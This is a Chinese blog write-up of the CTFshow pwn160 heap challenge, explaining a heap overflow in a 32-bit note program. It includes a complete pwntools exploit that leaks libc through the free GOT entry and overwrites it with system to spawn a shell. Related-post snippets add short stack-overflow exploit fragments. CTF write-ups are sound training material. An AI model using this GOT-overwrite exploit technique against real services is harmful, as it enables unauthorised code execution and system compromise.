CTFSHOW pwn160 WP

最新推荐文章于 2025-08-13 11:53:52 发布
原创 最新推荐文章于 2025-08-13 11:53:52 发布 · 303 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全

checksec:

32位 有canary和pie 

IDA32打开: 对对应堆函数名修改一下:

先看第一个add:

申请了两个堆,其中第一个是输入的大小,第二个是0x80的大小

13-16行指出,第二个堆的前4字节存第一个字节的堆指针 剩下的0x7C字节存name

edit函数:

有一个对读取长度的检查 : *dword_804B080[a1] + v2 >= (dword_804B080[a1] - 4)

dword_804B080是位于bss段上的堆指针 

这段的检查意图是:输入字符数需 小于等于 申请的第一个堆的data位置到第二个chunk的presize位前

那么如果让这申请的第一个堆和第二个堆之间再间隔一些chunk 就能实现堆溢出了

del函数:

只对创建两个chunk的第二个chunk堆指针置0了 

show:

普通的打印两个堆内容

综上,发现在add及edit处存在堆溢出漏洞

思路是先让两个堆之间有堆溢出的间隔,然后对之间的堆进行修改,得到flag

利用堆溢出先打印出free的got表,再计算libc基址得到system地址 最后将有free got表的堆改为system 并释放有binsh的堆 就能得到flag

exp:

from pwn import *

#p = process('./pwn160')
p = remote("pwn.challenge.ctf.show",  28309)
def add(size1, size2, message2):
    p.sendlineafter(b"Action: ", b'0')
    p.sendlineafter(b'size of description: ', str(size1))
    p.sendlineafter(b'name: ' , b'NAME')
    p.sendlineafter(b'text length: ', str(size2))
    p.sendlineafter(b'text: ' , message2)


def delete(index):
    p.sendlineafter(b'Action: ' , b'1')
    p.sendlineafter(b'index: ' , str(index))

def edit(index,size, message):
    p.sendlineafter(b'Action: ' , b'3')
    p.sendlineafter(b'index: ' , str(index))
    p.sendlineafter(b'text length: ', str(size))
    p.sendlineafter(b'text: ' , message)

def show(index):
    p.sendlineafter(b'Action: ' , b'2')
    p.sendlineafter(b'index: ' , str(index))

elf = ELF('./pwn160')
libc = ELF('./libc-2.23.so')

add(0x80, 0x80, b'AAA')
add(0x80, 0x80, b'BBB')
add(0x8, 0x8, b'/bin/sh\x00')
delete(0)
payload = b'a' * (0x198) + p32(elf.got['free'])
add(0x100, 0x19c, payload)
show(1)
p.recvuntil(b'description: ')
free_addr = u32(p.recv(4))

libc_base = free_addr - libc.sym['free']
print(hex(libc_base))
system_addr = libc_base + libc.sym['system']

edit(1, 0x4, p32(system_addr))
delete(2)
p.interactive()

ctfshow pwn wp
Chandra的学习之路
11-26 1041
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6738
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
CTFshow PWN162 堆利用技巧大杂烩
2301_79252433的博客
08-21 1123
这题算是目前在CTFshow做过的最有意思的一道了,记录一下前情提示:本题利用了fastbin_double_free,unsortedbin_attack,利用_IO_2_1_stdout泄露libc,house of spirit,UAF现在让我们来分析题目,查看菜单,给出了三个功能:add,view,delete。view是生成一只猪,就看看吧。哈哈哈~~~但它没有打印功能,丸辣,看看怎么泄露libc!!强推所有add函数(以下展示都是我加过注释后的)
CTFSHOW Pwn94 WP
qq_33348179的博客
05-30 219
存在system函数 用格式字符串漏洞 fmtstr_payload工具 劫持printf GOT为system PLT函数。可以进行多次的printf。32位 保护只开了NX。
CTFSHOW pwn95 WP
qq_33348179的博客
06-03 166
格式化字符串漏洞 但是没有sysetm函数。所以需要先泄露libc基址。
ctfshow 基础pwn wp
n1ptune__的博客
05-29 828
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
ctfshow pwn入门】
2301_78931332的博客
03-09 706
ctfshow pwn入门
CTFSHOW pwn143 WP
qq_33348179的博客
06-10 241
存在后门函数 且main函数的退出前会执行v4[1]位置的函数 该位置目前为goodbye_message函数。最后申请一个大小为-(0x60 + 0x8)的堆(v4[0]往后挪:v4[1])因为有着堆溢出且溢出长度没有限制 考虑house of force做法。可以看到 第一个堆(变量v4)距离 top chunk 0x60。先动态调试 找到该位置和top chunk的偏移。接下来将topchunk的size位修改为大数。可以修改堆的长度 存在堆溢出。
ctfshow pwn 06
A2247328295的博客
04-14 363
这里需要将payload的先指向retn的地址维持堆栈平衡,最后添加函数的首地址。exp很简单就不解释了,当然这里还可以这样实现,我们直接将地址指向 bin/sh。welcome函数和main函数就不看了,直接看getflag函数。在调用函数时,保证esp能正确恢复入栈之前的状态。可以看到这是一个64位的程序,需要考虑堆栈平衡。
CTFSHOW pwn163 WP
qq_33348179的博客
07-14 306
利用堆溢出将chunk1的size改为chunk1+chunk2的大小,再释放chunk1,接着申请和chunk1相同的大小,这样就能让chunk2的fd,bk显示出main_arena了。因为存在堆溢出漏洞,所以思路是先利用unsorted bin attack泄露libc,再利用malloc_hook执行one_gadget。按照malloc_hook创建fake chunk的流程来。calloc函数申请堆,申请的大小<=0x1000。保护全开 64位 IDA64打开。将指针置0了,正常的free。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5536
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 594
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
CTFSHOW-PWN入门-前置基础(pwn13-pwn19)
2402_84133101的博客
04-14 504
如果不等于9就先执行real()函数,然后再执行system函数打印出flag,因此nc连接之后输入9,获得flag。IDA查看反汇编代码,看到case3有system(cat /ctfshow_flag)函数,但是sleep(0x1BF52u)语句要睡眠0x1BF52秒,换算成10进制就是114514秒,那就是31个小时,所以另求他法。使用gcc编译文件后,在当前目录下创建文件key,内容为CTFshow,运行编译后文件,获得flag。ld -s -o flag flag.o生成flag可执行文件。
终端安全检测和防御技术
2501_92656792的博客
08-12 417
1.终端安全风险
FileLink:为企业跨网文件传输筑牢安全与效率基石
qq_73196442的博客
08-12 860
在企业数据往来日益频繁的今天,跨网文件传输的安全性和高效性是企业顺畅运营的关键。传统传输方式在安全防护、系统融合及成本控制上的短板愈发明显,而 FileLink 凭借在这些方面的突出表现,成为企业跨网文件传输的得力助手。
【web站点安全开发】任务2:HTML5核心特性与元素详解
不羁的博客
08-12 731
本文系统梳理了HTML的核心知识点与优化技巧,涵盖四大模块:1. HTML元素:详细解析行内、块级、行内块元素的布局特性与区别,以及替换/非替换元素的本质差异。2. HTML5新特性:重点介绍语义化标签、多媒体支持、增强表单、Canvas绘图、本地存储等核心功能,强调其开发价值与兼容性处理。3. 优化实践:提供图片加载、表单交互、页面性能、可访问性等场景的优化方案,包括懒加载、响应式图片、ARIA属性等实用技巧。4. 高频面试题:精解DOCTYPE、语义化、新特性等常见考点,帮助读者掌握面试应答要点。
智慧养老丨实用科普+避坑指南:科技如何让晚年生活更安全舒适?
最新发布
zskj_zhyl的博客
08-13 335
一位中风康复用户使用非接触式睡眠仪后,家属可远程查看夜间离床次数,及时调整护理方案,但需警惕部分产品数据解读复杂。我们这次主要介绍四类典型智慧养老产品,结合真实体验给出选购建议,并揭秘常见消费陷阱,助您理性选择。邯郸社区引入智能洗浴机后,失能老人洗浴频率从每月1次提升至每周2次,家庭矛盾显著减少。用户反馈显示,某品牌智能手表的跌倒检测准确率高,且支持家人远程查看健康数据。但需注意,部分低价产品误报率高,且续航不足,影响使用体验。选择时,建议与老人共同体验试用装,倾听其真实感受。
终端安全与网络威胁防护笔记
2403_86572967的博客
08-12 437
网关杀毒(Gateway Antivirus)是部署在网络网关设备(如防火墙、路由器、UTM 统一威胁管理设备等)上的病毒防护技术。其核心作用是在网络流量进入内部网络前,对数据进行扫描过滤,拦截恶意文件、病毒、蠕虫等威胁,阻止其渗透到内部终端或服务器。
LAZADA跨境电商自养号测评环境搭建:安全与合规的底层逻辑解析
m0_61644681的博客
08-11 502
通过工具模拟真实用户的设备特征(如机型、操作系统、屏幕分辨率等),并将设备参数伪装成目标市场本地用户的典型配置(例如东南亚地区的安卓手机+当地运营商网络组合),从而降低异常识别概率。测评系统的本质,是通过对平台风控逻辑的逆向理解,构建一套尽可能接近真实用户行为的技术环境。平台风控系统不仅依赖IP地址判断用户行为,更会通过设备指纹技术采集底层硬件参数,如MAC地址、设备ID、浏览器指纹、系统时区、语言设置等,进行多维度关联分析。
ctfshow pwn
08-07
你想了解关于 CTFShow Pwn 的信息吗?CTFShow 是一个国内知名的CTF比赛平台,Pwn 则是其中的一个攻防领域,主要涉及利用漏洞进行系统攻击和控制的技术。在 CTFShow Pwn 中,参赛选手需要通过分析二进制程序的漏洞,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值